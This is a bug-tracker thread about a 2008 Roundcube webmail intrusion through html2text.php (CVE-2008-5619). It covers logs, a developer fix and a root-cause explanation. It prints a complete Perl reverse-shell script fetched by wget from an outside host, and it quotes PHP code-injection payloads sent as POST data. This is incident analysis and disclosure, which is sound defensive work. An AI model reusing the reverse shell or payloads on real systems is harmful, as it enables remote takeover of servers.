Break-in possiblity via html2text.php?

[RealMurphy]

Hi all,

since I cannot reproduce this I try to describe this problem from the current installation status and not against trunk (sorry for that).

Last night someone broke into my apache-container via roundcube (99.9% sure here), the system is a current Debian Lenny, with these versions:

roundcube 0.2-beta PHP is 5.2.6 mailserver is postfix on a remote virtual server

In the logs I have found the following:

apache's access.log:

192.168.100.2 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

192.168.100.2 is another webserver acting as a proxy to this webmail apache (i.e. just rewriting and forwarding the requests), the real IP was

200.171.152.187 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "
Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "
Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "G
ooglebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 502 595 "-"
"Googlebot/2.1 ( http://www.google.com/bot.html)"

In the error log I see this nasty bit at the same time:

--2008-12-08 23:05:16--  http://mmbt.co.uk/img/back.txt
Resolving mmbt.co.uk... 81.31.121.138
Connecting to mmbt.co.uk|81.31.121.138|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 541 [text/plain]
Saving to: `back.txt.1'

     0K                                                       100% 56.0M=0s

2008-12-08 23:05:16 (56.0 MB/s) - `back.txt.1' saved [541/541]

For completeness this is the script which was downloaded:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

There is nothing in either console, errors or sendmail in roundcubes log messages.

Since I believe this is potentially dangerous (and this incident happened to put my box onto several blacklist for sending out >50k spam emails) I've bumbed up the severity.

Anything else you could need from me?

Cheers

Carsten

[ziba]

bin/html2text.php does use html_entity_decode which had a security issue: http://www.juniper.net/security/auto/vulnerabilities/vuln17296.html

but that was supposed to be fixed in PHP 5.1.3-RC1

[ksteinhoff]

Why do you suspect html2text.php? The time stamp on error log entry you quote is 23:05:16 and the time stamps in your transfer log lines begin at 23:07:50.

[RealMurphy]

OK, trying to do it better this time. html2text.php was the only call with POST data. unless I'm mistaken with a GET you will not be able to break into a system right? The initial copy & paste was not covering the full log file, sorry about that. This is the full access.log

192.168.100.2 - - [08/Dec/2008:17:41:46 +0100] "GET /roundcube/skins/default/images/display/info.png HTTP/1.1" 200 2162 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:04:51 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:04:55 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 79 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:04:59 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 88 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:38 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:06:26 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "http://www.google.com/search?hl=en&q=intitle:%22RoundCube+Webmail%22+site:com&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:27 +0100] "GET /roundcube/skins/default/images/favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:28 +0100] "GET /roundcube/skins/default/common.css HTTP/1.1" 200 6680 "https://myhost/roundcube/"
 "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:28 +0100] "GET /roundcube/program/js/common.js HTTP/1.1" 200 16650 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:29 +0100] "GET /roundcube/program/js/app.js HTTP/1.1" 200 110423 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/roundcube_logo.png HTTP/1.1" 200 4868 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/listheader_aqua.gif HTTP/1.1" 200 270 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/buttons/bg.gif HTTP/1.1" 200 211 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:40 +0100] "GET /roundcube/program/js/tiny_mce/r.php HTTP/1.1" 200 33924 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:41 +0100] "GET /roundcube/program/js/tiny_mce/r.php HTTP/1.1" 200 33924 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [09/Dec/2008:06:55:28 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.168.100.2 - - [09/Dec/2008:12:56:27 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"

[estadtherr]

If I understand the description, a vulnerability in html2text.php allowed an attacker to cause your web server to download a malicious perl script (is back.txt the perl script or is back.txt yet another file?) This perl script opens a socket to a host/port specified on its command line and hooks a command shell's input/output to that socket. Through this remote shell, the attacker was able to send out spam from your server.

How did the attacker get the perl script to execute? Are there two vulnerabilities, i.e. allowing a download and allowing execution of an arbitrary script?

[RealMurphy]

It looks like back.txt is the local file name of the perlscript. Since I just see the wget output and not the command line it's hard to tell. wget downloaded this file to /tmp and also a zip file named jess.zip which I yet have to figure out what this one does (sorry for not mentioning this earlier, I forgot to look where back.txt would be on the system):

webmail:/tmp# file jess.zip
jess.zip: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
webmail:/tmp# ldd jess.zip
        not a dynamic executable

Of course this is not a zip file but a root exploit, running strings shows:

Linux vmsplice Local Root Exploit
 By qaaz
!@#$

OK, rounding it up again: It seems that the multiple POST requests were used to downlaod the perl script, the root exploit and was possibly also used for starting it, however, that part I still don't know how they might have achieved it - but my knowledge there is rather limited.

[till]

That's interesting and we haven't really analyzed this yet, but the quickfix to this issue is to install mod_security on the server. GotRoot has a bunch of filter rules and they catch this stuff easily.

Not the solution to the problem, but a workaround.

Thanks for reporting!

[alec]

Found vulnerable preg_replace() use. Fixed in r2148, but we'll know for sure when we get POST data used for attack. Closing the ticket now.

[RealMurphy]

I'm still running 0.2-beta as a kind of honeypot. During the night from Saturday to Sunday someone tried again the same hack, but this line did not really lock much:

file_put_contents('/var/log/roundcube/hack', date('r').': '.print_r($_REQUEST, true)."\n", FILE_APPEND);

The result:

Sun, 21 Dec 2008 02:42:28 +0100: Array
(
)

Sun, 21 Dec 2008 02:42:32 +0100: Array
(
)

Sun, 21 Dec 2008 02:42:54 +0100: Array
(
)

Apache log lines:

192.168.100.2 - - [21/Dec/2008:02:42:27 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [21/Dec/2008:02:42:32 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 79 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [21/Dec/2008:02:42:54 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

I leave this issue closed but may add more info on the exploit if I get some

[alec]

check variables_order in php.ini and set to "GPC"

[RealMurphy]

Done, waiting for next attack

[pnfisher]

We had someone probe our system for the html2text.php exploit today. I've removed the "Host" header, which was properly set.

POST /rc/bin/html2text.php HTTP/1.1
Pragma: no-cache
Accept: */*
Content-Type: ''
Connection: Keep-Alive
Content-Length: 28

<b>{${system(uname -a)}}</b>

[alec]

This bug is known as CVE-2008-5619

[paul]

We were also attacked through html2text.php. The hacker tried to install a backdoor, probably using 'b{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}/b' as postdata, as explained on http://zastita.com/015038/roundcube-webmail-.html. In the announcement of the security update for Roundcube 0.2 Beta, you might have mentioned that 0.1 Stable was also vulnerable.

[stuge]

A customer of mine was also hit by this.

While r2148 fixes the problem in a perfectly safe manner and also adds proper handling for multibyte characters (excellent!) no analysis I have read so far has been completely correct about what is really going on.

preg_replace() with the e modifier allows execution of PHP code, but that's not the problem.

Before the superior fix in r2148, the problem was how entries in the html2text::$replace array were written like so:

      'strtoupper("\\1")',                    // <b>

instead of:

      'strtoupper(\'\\1\')',                    // <b>

When using double quotes in the strtoupper() call, any text which is replaced into there from the POST data can contain Complex strings and will have those complex strings processed by PHP, when the entire argument really must be handled as untrusted input.

Using single quotes clarifies to the PHP interpreter that this is data which should not be processed further, so any complex strings will be ignored.

[stuge]

Replying to stuge:

no analysis I have read so far has been completely correct about what is really going on.

To be fair, Jacobo Avariento Gimeno at Sofistic described the problem accurately, but didn't point out the double quotes in the function call.